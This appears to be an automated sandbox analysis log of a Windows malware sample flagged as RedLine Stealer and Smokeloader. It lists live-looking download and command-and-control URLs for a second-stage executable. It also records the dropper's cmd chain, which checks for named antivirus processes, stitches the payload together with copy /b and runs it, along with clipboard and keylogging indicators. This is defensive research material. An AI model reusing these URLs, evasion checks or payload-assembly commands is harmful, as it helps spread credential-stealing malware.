Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.37

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Code function: 15_2_001229BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

15_2_001229BA

Source: global traffic	HTTP traffic detected: GET /track_prt.php?sub=0&cc=DE HTTP/1.1User-Agent: ShareScreenHost: post-to-me.com
Source: global traffic	HTTP traffic detected: GET /ScreenUpdateSync.exe HTTP/1.1User-Agent: ShareScreenHost: 176.113.115.37
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.150Connection: Keep-AliveCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: OrCgYwgbqLzMaeWAfOkOCMa.OrCgYwgbqLzMaeWAfOkOCMa
Source: global traffic	DNS traffic detected: DNS query: post-to-me.com

Source: unknown

Source: Welding.pif, Welding.pif, 0000000F.00000002.4150963294.0000000001344000.00000004.00000020.00020000.00000000.sdmp, Welding.pif, 0000000F.00000002.4150963294.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Welding.pif, 0000000F.00000003.2109919417.0000000001345000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.37/ScreenUpdateSync.exe
Source: Welding.pif, 0000000F.00000003.2109919417.0000000001345000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.37/ScreenUpdateSync.exe:
Source: Welding.pif, 0000000F.00000002.4150653141.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.37/ScreenUpdateSync.exeprtscreen1566SOFTWARE
Source: 478F.tmp.exe, 00000010.00000002.2258896880.000000000080D000.00000004.00000020.00020000.00000000.sdmp, 478F.tmp.exe, 00000010.00000002.2258796788.00000000007CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150
Source: 478F.tmp.exe, 00000010.00000002.2258896880.000000000080D000.00000004.00000020.00020000.00000000.sdmp, 478F.tmp.exe, 00000010.00000002.2258896880.0000000000843000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/
Source: 478F.tmp.exe, 00000010.00000002.2258896880.0000000000843000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/Hx
Source: 478F.tmp.exe, 00000010.00000002.2258896880.000000000080D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/L
Source: 478F.tmp.exe, 00000010.00000002.2258896880.0000000000859000.00000004.00000020.00020000.00000000.sdmp, 478F.tmp.exe, 00000010.00000002.2258896880.0000000000843000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/edd20096ecef326d.php
Source: 478F.tmp.exe, 00000010.00000002.2258896880.0000000000843000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/edd20096ecef326d.php32
Source: 478F.tmp.exe, 00000010.00000002.2258896880.000000000080D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/edd20096ecef326d.php;C7
Source: 478F.tmp.exe, 00000010.00000002.2258896880.0000000000843000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/edd20096ecef326d.phpDZT
Source: 478F.tmp.exe, 00000010.00000002.2258896880.0000000000859000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/edd20096ecef326d.phpL
Source: 478F.tmp.exe, 00000010.00000002.2258896880.0000000000843000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/edd20096ecef326d.phpXZH
Source: 478F.tmp.exe, 00000010.00000002.2258896880.0000000000859000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/edd20096ecef326d.phpd
Source: 478F.tmp.exe, 00000010.00000002.2258896880.0000000000843000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/ows
Source: 478F.tmp.exe, 00000010.00000002.2258796788.00000000007CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150PT~
Source: Welding.pif	String found in binary or memory: http://62.204.41.151/ScreenUpdateSync.exe
Source: Welding.pif, 0000000F.00000002.4150653141.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.151/ScreenUpdateSync.exegyaCannot
Source: M13W1o3scc.exe, 00000000.00000003.1693698599.00000000028A4000.00000004.00000020.00020000.00000000.sdmp, Welding.pif.1.dr, Reference.0.dr	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: M13W1o3scc.exe, 00000000.00000003.1693698599.00000000028A4000.00000004.00000020.00020000.00000000.sdmp, Welding.pif.1.dr, Reference.0.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: M13W1o3scc.exe, 00000000.00000003.1693698599.00000000028A4000.00000004.00000020.00020000.00000000.sdmp, Welding.pif.1.dr, Reference.0.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: M13W1o3scc.exe, 00000000.00000003.1693698599.00000000028A4000.00000004.00000020.00020000.00000000.sdmp, Welding.pif.1.dr, Reference.0.dr	String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: M13W1o3scc.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: M13W1o3scc.exe, 00000000.00000003.1693698599.00000000028A4000.00000004.00000020.00020000.00000000.sdmp, Welding.pif.1.dr, Reference.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: M13W1o3scc.exe, 00000000.00000003.1693698599.00000000028A4000.00000004.00000020.00020000.00000000.sdmp, Welding.pif.1.dr, Reference.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: M13W1o3scc.exe, 00000000.00000003.1693698599.00000000028A4000.00000004.00000020.00020000.00000000.sdmp, Welding.pif.1.dr, Reference.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: M13W1o3scc.exe, 00000000.00000003.1693698599.00000000028A4000.00000004.00000020.00020000.00000000.sdmp, Welding.pif.1.dr, Reference.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: M13W1o3scc.exe, 00000000.00000003.1693698599.00000000028A4000.00000004.00000020.00020000.00000000.sdmp, Welding.pif.1.dr, Reference.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: Amcache.hve.19.dr	String found in binary or memory: http://upx.sf.net
Source: M13W1o3scc.exe, 00000000.00000003.1693698599.00000000028A4000.00000004.00000020.00020000.00000000.sdmp, Welding.pif, 0000000A.00000000.1728096026.0000000000179000.00000002.00000001.01000000.00000007.sdmp, Welding.pif, 0000000F.00000000.2028195478.0000000000179000.00000002.00000001.01000000.00000007.sdmp, Welding.pif.1.dr, Reference.0.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: Welding.pif, 0000000F.00000002.4150963294.0000000001318000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://post-to-me.com/
Source: Welding.pif, 0000000F.00000002.4150963294.0000000001318000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://post-to-me.com/P
Source: Welding.pif	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=
Source: Welding.pif, 0000000F.00000002.4150653141.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=&cc=DEvector
Source: Welding.pif, 0000000F.00000002.4150963294.0000000001318000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE
Source: M13W1o3scc.exe, 00000000.00000003.1693698599.00000000028A4000.00000004.00000020.00020000.00000000.sdmp, Welding.pif.1.dr, Reference.0.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Reference.0.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: M13W1o3scc.exe, 00000000.00000003.1693698599.00000000028A4000.00000004.00000020.00020000.00000000.sdmp, Welding.pif.1.dr, Reference.0.dr	String found in binary or memory: https://www.globalsign.com/repository/06

Source: unknown	Network traffic detected: HTTP traffic on port 60060 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60060

Source: unknown

HTTPS traffic detected: 172.67.179.207:443 -> 192.168.2.4:60060 version: TLS 1.2

Contains functionality for read data from the clipboard

Source: C:\Users\user\Desktop\M13W1o3scc.exe

0_2_004050CD

Contains functionality to modify clipboard data

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00124830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,	15_2_00124830
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000BEF4F IsClipboardFormatAvailable,EmptyClipboard,SetClipboardData,	15_2_000BEF4F
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_004016E3 __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,	15_2_004016E3
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_004026BB InternetReadFile,_strlen,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,GlobalFree,	15_2_004026BB

Contains functionality to read the clipboard data

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

15_2_00124632

Contains functionality to retrieve information about pressed keystrokes

Source: C:\Users\user\Desktop\M13W1o3scc.exe

0_2_004044A5

Potential key logger detected (key state polling based)

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

15_2_0013D164

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000010.00000002.2258864711.00000000007E1000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000010.00000002.2259075839.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Contains functionality to communicate with device drivers

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Code function: 15_2_00114254: CreateFileW,DeviceIoControl,CloseHandle,

15_2_00114254

Contains functionality to launch a process as a different user

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

15_2_00108F2E

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\Desktop\M13W1o3scc.exe	Code function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,		0_2_00403883
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00115778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		15_2_00115778

Creates files inside the system directory

Source: C:\Users\user\Desktop\M13W1o3scc.exe	File created: C:\Windows\EffortCoupled	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	File created: C:\Windows\FindingItunes	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	File created: C:\Windows\RaleighWard	Jump to behavior

Detected potential crypto function

Source: C:\Users\user\Desktop\M13W1o3scc.exe	Code function: 0_2_0040497C	0_2_0040497C
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Code function: 0_2_00406ED2	0_2_00406ED2
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Code function: 0_2_004074BB	0_2_004074BB
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000D23F5	15_2_000D23F5
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00138400	15_2_00138400
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000E6502	15_2_000E6502
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000E265E	15_2_000E265E
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000BE6F0	15_2_000BE6F0
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000D282A	15_2_000D282A
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000E89BF	15_2_000E89BF
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00130A3A	15_2_00130A3A
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000E6A74	15_2_000E6A74
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000C0BE0	15_2_000C0BE0
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000DCD51	15_2_000DCD51
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0010EDB2	15_2_0010EDB2
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00118E44	15_2_00118E44
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00130EB7	15_2_00130EB7
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000E6FE6	15_2_000E6FE6
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000BB020	15_2_000BB020
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000D33B7	15_2_000D33B7
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000DF409	15_2_000DF409
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000CD45D	15_2_000CD45D
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000B94E0	15_2_000B94E0
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000CF628	15_2_000CF628
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000B1663	15_2_000B1663
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000BF6A0	15_2_000BF6A0
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000D16B4	15_2_000D16B4
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000D78C3	15_2_000D78C3
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000D1BA8	15_2_000D1BA8
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000DDBA5	15_2_000DDBA5
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000B9C80	15_2_000B9C80
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000BF6A0	15_2_000BF6A0
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000E9CE5	15_2_000E9CE5
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000CDD28	15_2_000CDD28
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000D1FC0	15_2_000D1FC0
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000DBFD6	15_2_000DBFD6
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0040806D	15_2_0040806D
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00438013	15_2_00438013
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00428434	15_2_00428434
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0042E56A	15_2_0042E56A
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00429510	15_2_00429510
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0041765F	15_2_0041765F
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_004146D5	15_2_004146D5
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00438729	15_2_00438729
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_004287A6	15_2_004287A6
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0040F91D	15_2_0040F91D
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00428A50	15_2_00428A50
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00419A5F	15_2_00419A5F
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0042FB60	15_2_0042FB60
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00428D17	15_2_00428D17
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00414EBB	15_2_00414EBB
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00428FD2	15_2_00428FD2

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\773416\Welding.pif D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: String function: 000C1A36 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: String function: 000D0D17 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: String function: 004108AC appears 36 times
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: String function: 00410D5B appears 127 times
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: String function: 004116D0 appears 54 times
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: String function: 000D8B30 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: String function: 004045C0 appears 317 times
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Code function: String function: 004062A3 appears 58 times

One or more processes crash

Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8096 -s 1048

Sample file is different than original file name gathered from version info

Source: M13W1o3scc.exe, 00000000.00000003.1693698599.00000000028A4000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameAutoIt3.exeB vs M13W1o3scc.exe

Uses 32bit PE files

Source: M13W1o3scc.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 00000010.00000002.2258864711.00000000007E1000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000010.00000002.2259075839.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.evad.winEXE@27/22@2/3

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Code function: 15_2_0011A6AD GetLastError,FormatMessageW,

15_2_0011A6AD

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00108DE9 AdjustTokenPrivileges,CloseHandle,		15_2_00108DE9
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00109399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		15_2_00109399

Source: C:\Users\user\Desktop\M13W1o3scc.exe

0_2_004044A5

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Code function: 15_2_00114148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

15_2_00114148

Source: C:\Users\user\Desktop\M13W1o3scc.exe

Code function: 0_2_004024FB CoCreateInstance,

0_2_004024FB

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Code function: 15_2_000BE36D QueryPerformanceFrequency,timeGetTime,LockResource,Sleep,

15_2_000BE36D

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\track_prt[1].htm

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8096
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Mutant created: \Sessions\1\BaseNamedObjects\prtscreen1566
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7384:120:WilError_03

Source: C:\Users\user\Desktop\M13W1o3scc.exe

File created: C:\Users\user\AppData\Local\Temp\nsp6BB5.tmp

Jump to behavior

Source: C:\Users\user\Desktop\M13W1o3scc.exe

Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Halo Halo.bat & Halo.bat

Source: M13W1o3scc.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\M13W1o3scc.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\M13W1o3scc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: M13W1o3scc.exe

Virustotal: Detection: 11%

Source: C:\Users\user\Desktop\M13W1o3scc.exe

File read: C:\Users\user\Desktop\M13W1o3scc.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\M13W1o3scc.exe "C:\Users\user\Desktop\M13W1o3scc.exe"
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Halo Halo.bat & Halo.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 773416
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "MineralAlertSignificantVanilla" Partition
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Transmit + ..\Turtle + ..\Vienna + ..\Diet + ..\Enclosure + ..\Bangladesh + ..\Mobility + ..\Cool + ..\Completely A
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\773416\Welding.pif Welding.pif A
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Process created: C:\Users\user\AppData\Local\Temp\773416\Welding.pif C:\Users\user\AppData\Local\Temp\773416\Welding.pif
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Process created: C:\Users\user\AppData\Local\Temp\478F.tmp.exe "C:\Users\user\AppData\Local\Temp\478F.tmp.exe"
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8096 -s 1048
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Halo Halo.bat & Halo.bat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 773416	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "MineralAlertSignificantVanilla" Partition	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Transmit + ..\Turtle + ..\Vienna + ..\Diet + ..\Enclosure + ..\Bangladesh + ..\Mobility + ..\Cool + ..\Completely A	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\773416\Welding.pif Welding.pif A	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Process created: C:\Users\user\AppData\Local\Temp\773416\Welding.pif C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Process created: C:\Users\user\AppData\Local\Temp\478F.tmp.exe "C:\Users\user\AppData\Local\Temp\478F.tmp.exe"	Jump to behavior

Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: wldp.dll	Jump to behavior
